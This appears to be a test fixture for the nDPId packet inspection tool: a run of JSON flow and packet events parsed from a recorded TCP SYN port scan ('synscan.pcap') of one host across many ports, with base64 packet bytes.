-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1919,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsWhoAACcGx1isEAAIQA2GNIzTD6HdU4MZAAAAAGACEAAY6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1920,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsS5QAAC8Gzd6sEAAIQA2GNIzTBwndU4MZAAAAAGACEAAhgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsHecAADsG74usEAAIQA2GNIzTCi\/dU4MZAAAAAGACEAAeXQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5678,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1922,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsTZwAADUGxdasEAAIQA2GNIzTFi7dU4MZAAAAAGACCAAaXgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3689,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1923,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsKBoAADoG5lisEAAIQA2GNIzTDmndU4MZAAAAAGACDAAeIwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1924,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADMGT5ysEAAIQA2GNIzTC2jdU4MZAAAAAGACEAAdJAAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1935,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1925,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsPDwAACgG5DasEAAIQA2GNIzSJxzdUoMYAAAAAGACBAANcwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1936,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1926,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsPEQAADsG0S6sEAAIQA2GNIzSA\/3dUoMYAAAAAGACEAAkkgAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061310,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061310,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1927,"flow_packet_id":1,"flow_last_seen":1278275061310,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061310,"pkt":"ACYLMQczACWzv5HuCABFAAAsi7EAACcGlcGsEAAIQA2GNIzS6nTdUoMYAAAAAGACEAA+GgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4998,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1938,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1928,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsjGYAADIGigysEAAIQA2GNIzSE4bdUoMYAAAAAGACDAAZCQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1929,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsgZEAADgGjuGsEAAIQA2GNIzSE4rdUoMYAAAAAGACBAAhBQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsWyIAAC8GvlCsEAAIQA2GNIzSBETdUoMYAAAAAGACEAAkSwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsZykAADkGqEmsEAAIQA2GNIzSCDfdUoMYAAAAAGACCAAoWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+4AADMGFYSsEAAIQA2GNIzSBBndUoMYAAAAAGACEAAkdgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADAGUpysEAAIQA2GNIzSImDdUoMYAAAAAGACBAASLwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsGjIAADgG9kCsEAAIQA2GNIzSJErdUoMYAAAAAGACBAAQRQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscfUAADIGpH2sEAAIQA2GNIzSwADdUoMYAAAAAGACDABsjgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAs8oIAACYGL\/CsEAAIQA2GNIzSB0fdUoMYAAAAAGACDAAlSAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsznsAACkGUPesEAAIQA2GNIzSCWHdUoMYAAAAAGACCAAnLgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AACUGDNSsEAAIQA2GNIzSC9fdUoMYAAAAAGACCAAkuAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAspUsAACUGfiesEAAIQA2GNIzSATLdUoMYAAAAAGACCAAvXQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsYO4AACkGvoSsEAAIQA2GNIzSBxTdUoMYAAAAAGACCAApewAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsubMAADUGWb+sEAAIQA2GNIzSBFDdUoMYAAAAAGACCAAsPwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsfYYAADMGl+ysEAAIQA2GNIzSCp7dUoMYAAAAAGACEAAd8QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 